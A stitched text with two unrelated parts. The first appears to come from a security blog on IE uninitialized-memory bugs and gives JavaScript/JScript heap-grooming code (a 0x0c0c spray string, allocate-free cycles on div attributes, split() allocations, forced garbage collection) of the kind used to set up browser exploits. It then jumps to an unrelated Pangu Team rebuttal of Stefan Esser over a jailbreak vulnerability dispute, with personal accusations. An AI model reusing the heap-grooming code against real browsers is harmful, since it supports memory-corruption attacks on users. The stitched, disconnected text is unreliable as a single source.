Looking back over Microsoft's history of IE patches, cross-domain vulnerabilities once dominated, and ActiveX controls also produced a large number of issues. Apart from those two categories, Microsoft has also patched quite a few overflows and some dangling-pointer vulnerabilities. In recent years, use-after-free bugs have been very numerous, together with some type-confusion vulnerabilities. On the whole, though, uninitialized-memory vulnerabilities are extremely rare, and no exploits for them have appeared publicly. Since the vulnerability rumoured to have been used to break IE at this Pwn2Own is an uninitialized-memory bug, we became interested and looked through some of the related MSDN documentation.
var i=0;
var vault=new Array();
// Build a Unicode string of repeated 0x0c0c and cut it to (0x20-2)/2 = 15 characters
var str=unescape("%u0c0c%u0c0c");
while (str.length<0xf0) str=str+str;
str=str.substr(0, (0x20-2)/2);
// Create 1000 div elements, each holding a copy of str in its title attribute
for (i=0;i<1000;i++) {
    vault.push(document.createElement("div"));
    vault[i].setAttribute("title",str);
}
// Clear the titles again and force garbage collection so the attribute strings are released
for (i=0;i<1000;i++) vault[i].setAttribute("title","");
CollectGarbage();
// Second stage: build one long string of 3-character tokens separated by spaces
var longstr="";
var sprtr=" ";
for(i=0;i<1000;i++)
    longstr+=String.fromCharCode((i/100)%100+0x21,i%100+0x21,0x41,0x41,0x41,0x41).substr(0,3)+sprtr;
// split() allocates about 1000 small strings at once; dropping the array and collecting releases them again
var vault=longstr.split(sprtr);
vault=null;
CollectGarbage();
<script language="JScript.Compact">
// Same sequence as above, this time run under the JScript.Compact engine
var longstr="";
var sprtr=" ";
for(i=0;i<1000;i++)
    longstr+=String.fromCharCode((i/100)%100+0x21,i%100+0x21,0x41,0x41,0x41,0x41).substr(0,3)+sprtr;
// split() allocates about 1000 small strings at once; dropping the array and collecting releases them again
var vault=longstr.split(sprtr);
vault=null;
CollectGarbage();
</script>
After the release of our blogpost, it is very funny to see that Mr. Stefan continues to post unwarranted and spiteful conjectures on Twitter and in his blogpost. We suggest the reader refer to our blogpost as well as his blogpost to understand the background.
Among his numerous discriminations and accusations against us (such as calling us thieves and criminals), the main one is that he claims that we have been trying to buy/acquire vulnerabilities to achieve jailbreaks. The “horribly” strong evidence is a piece of chat history between him and @windknown, a member of our team. Although we think it is immoral to post private messages to the public, we do not mind showing the full chat history, and let the truth speak for itself.
The chat happened on June 23, 2014, after the first release of Pangu 7. After receiving his complaint, @windknown tried to communicate with Stefan to fix the “friendship” with Stefan. They had already known each other since 2009.
At the beginning, we apologized and suggested that Pangu Team should officially acknowledge Stefan for his contribution to Pangu 7. In fact, we did acknowledge him on both the website and the release notes of the jailbreak tool, before replacing his vulnerability with our own.
Next, we explained that we didn’t realize that we were not allowed to use the vulnerability which was discussed in the training. We even tried to share a different vulnerability discovered by our team with Stefan, in order to compensate for his “loss”. We eventually used that vulnerability to replace the bug discussed in his training in the Pangu jailbreak tool. This clearly indicates that there was no need at all for us to buy any vulnerabilities for the jailbreak, because we already had enough vulnerabilities for our jailbreak tool.
Then, we offered a more straightforward option, i.e., financial compensation. Since we were told that Stefan Esser had done some consulting projects for security companies in which he needed to provide details of vulnerabilities he discovered (a kind of business by selling bugs), we felt that using the vulnerability might affect Stefan’s business and thus tried to financially compensate him. Apparently, we cannot afford one million dollars, LOL.
Finally, about the new lightning debug cable: Stefan mentioned during the training course that he was very interested in it because it would be very helpful for his kernel debugging or iBoot stuff. He also asked us whether or not we were able to find such a cable in China. That’s why we proposed to find such a cable so that we could compensate him. It is not very difficult to find similar cables in electronics markets like Zhongguancun.
So far, it is very clear that we tried our best to make Stefan happy and satisfied, but failed. We have to emphasize that trying to financially compensate Stefan happened after the release of Pangu 7. The fact is so straightforward, i.e., we used his vulnerability that we learned from the training, and he complained, so we proposed several ways including financial compensation to fix the mistake we made.
However, Stefan’s explanation and his blogpost misled the reader on purpose. Using a piece of the chat history without the context, Stefan deliberately misled the reader into believing that the Pangu Team tried to buy a vulnerability from him for the jailbreak, which is definitely not true.
Ok, now let’s move to the funnier parts and see how his logic works.
He mentioned that “They even let one of their friends ask in the QA session of my talk at SyScan if I had physical proof for some of the things, so that they could get away with claiming that this is not true…”
After reading the text above, we have to suspect that Stefan might have persecutory delusions. In fact, how could we predict what Stefan would present at the conference? How could we arrange for a friend to ask him a question? So far we still have no idea who asked what question. But it is not at all surprising if attendees challenge such a ridiculous judgment and ask for any evidence.
Update (Apr 11, 2015): We just learned that @xi4oyu is the attendee who asked whether Stefan had any evidence after the uncomfortable talk. Unfortunately, he was misunderstood as if he had been instructed by us, probably for language reasons. He posted several tweets to clarify the fact. We highly appreciate him for raising the question and clarifying the fact.
He also pointed out that “But it is also questionable how they can afford to organize security conferences in expensive chinese hotels when they only get these small amounts.”
Thanks for the advertisement. Following his logic, any organizers of security conferences must have unclear sponsorships, otherwise how could they run these conferences? We are running a mobile security conference in Shanghai; please visit the MOSEC website for more information. This conference is co-organized by our team and PoC, which is a security conference in South Korea with a 9-year history. We appreciate the support and budgets from our partners and conference sponsors. Tickets are on sale now, at a reasonable price.
Stefan said we started the war. If you take a look at his tweets, you can easily find that he kept attacking us, and even the people who tried to defend us, but we always kept silent until the release of his racism talk at Syscan 2015. Again, we wish all of this meaningless stuff would end as soon as possible. However, if Stefan continues to distribute his unwarranted and spiteful conjectures and rumors, we will not keep silent.
Almost forgot to mention that we also wasted many hours, the same as Stefan, on writing the blog. Because of this, we haven’t even had time to test our exploits on iOS 8.3.